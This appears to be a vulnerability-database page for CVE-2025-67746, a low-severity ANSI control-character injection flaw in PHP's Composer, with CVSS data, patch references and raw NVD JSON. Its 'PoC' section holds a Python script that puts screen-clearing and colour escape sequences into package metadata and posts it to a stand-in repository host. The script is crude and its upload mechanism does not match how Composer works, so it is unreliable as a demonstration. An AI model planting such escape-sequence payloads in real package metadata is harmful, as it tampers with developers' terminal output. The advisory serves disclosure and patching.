CVE-2025-67746

Description

Composer is a dependency manager for PHP. In versions on the 2.x branch prior to 2.2.26 and 2.9.3, attackers controlling remote sources that Composer downloads from might in some way inject ANSI control characters in the terminal output of various Composer commands, causing mangled output and potentially leading to confusion or DoS of the terminal application. There is no proven exploit and this has thus a low severity but we still publish a CVE as it has potential for abuse, and we want to be on the safe side informing users that they should upgrade. Versions 2.2.26 and 2.9.3 contain a patch for the issue.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:getcomposer:composer:*:*:*:*:*:*:*:* - VULNERABLE

Composer 2.x < 2.2.26

Composer 2.x < 2.9.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# 恶意ANSI转义序列示例
# 攻击者可在包描述中注入ANSI控制字符
malicious_payload = "\033[2J\033[H"  # 清屏
malicious_payload += "\033[31m"  # 红色文本
malicious_payload += "Malicious Content"
malicious_payload += "\033[0m"  # 重置

# 完整的PoC脚本
import requests
import json

def create_malicious_package():
    # 创建包含恶意ANSI转义序列的包元数据
    payload = {
        "name": "evil/package",
        "description": "\033[2J\033[H" + " "*10000 + "Hacked!",
        "version": "1.0.0"
    }
    
    # 上传到恶意的Composer仓库
    response = requests.post(
        "http://malicious-repo.example.com/packages",
        json=payload
    )
    
    return response.status_code == 200

def exploit():
    if create_malicious_package():
        print("Malicious package created successfully")
    else:
        print("Failed to create malicious package")

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-67746
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-67746
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-67746/
[4] VulDB https://vuldb.com/cve/CVE-2025-67746
[5] https://github.com/composer/composer/commit/1d40a95c9d39a6b7f80d404ab30336c586da9917
[6] https://github.com/composer/composer/commit/5db1876a76fdef76d3c4f8a27995c434c7a43e71
[7] https://github.com/composer/composer/releases/tag/2.2.26
[8] https://github.com/composer/composer/releases/tag/2.9.3
[9] https://github.com/composer/composer/security/advisories/GHSA-59pp-r3rg-353g

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-67746", "sourceIdentifier": "[email protected]", "published": "2025-12-30T16:15:47.170", "lastModified": "2026-02-25T14:54:30.833", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Composer is a dependency manager for PHP. In versions on the 2.x branch prior to 2.2.26 and 2.9.3, attackers controlling remote sources that Composer downloads from might in some way inject ANSI control characters in the terminal output of various Composer commands, causing mangled output and potentially leading to confusion or DoS of the terminal application. There is no proven exploit and this has thus a low severity but we still publish a CVE as it has potential for abuse, and we want to be on the safe side informing users that they should upgrade. Versions 2.2.26 and 2.9.3 contain a patch for the issue."}, {"lang": "es", "value": "Composer es un gestor de dependencias para PHP. En versiones de la rama 2.x anteriores a la 2.2.26 y 2.9.3, atacantes que controlan fuentes remotas de las que Composer descarga podrían de alguna manera inyectar caracteres de control ANSI en la salida de terminal de varios comandos de Composer, causando una salida distorsionada y potencialmente llevando a confusión o DoS de la aplicación de terminal. No hay un exploit probado y esto tiene por lo tanto una baja severidad, pero aún publicamos un CVE ya que tiene potencial de abuso, y queremos estar seguros informando a los usuarios de que deben actualizar. Las versiones 2.2.26 y 2.9.3 contienen un parche para el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:getcomposer:composer:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.2.26", "matchCriteriaId": "6B8D068B-A6E3-4084-A8C4-07CA81E267A7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getcomposer:composer:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.3.0", "versionEndExcluding": "2.9.3", "matchCriteriaId": "CCCF50D3-91B5-4957-A5B0-50D2B41C5264"}]}]}], "references": [{"url": "https://github.com/composer/composer/commit/1d40a95c9d39a6b7f80d404ab30336c586da9917", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/composer/composer/commit/5db1876a76fdef76d3c4f8a27995c434c7a43e71", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/composer/composer/releases/tag/2.2.26", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/composer/composer/releases/tag/2.9.3", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/composer/composer/security/advisories/GHSA-59pp-r3rg-353g", "source": "security-advi ... (truncated)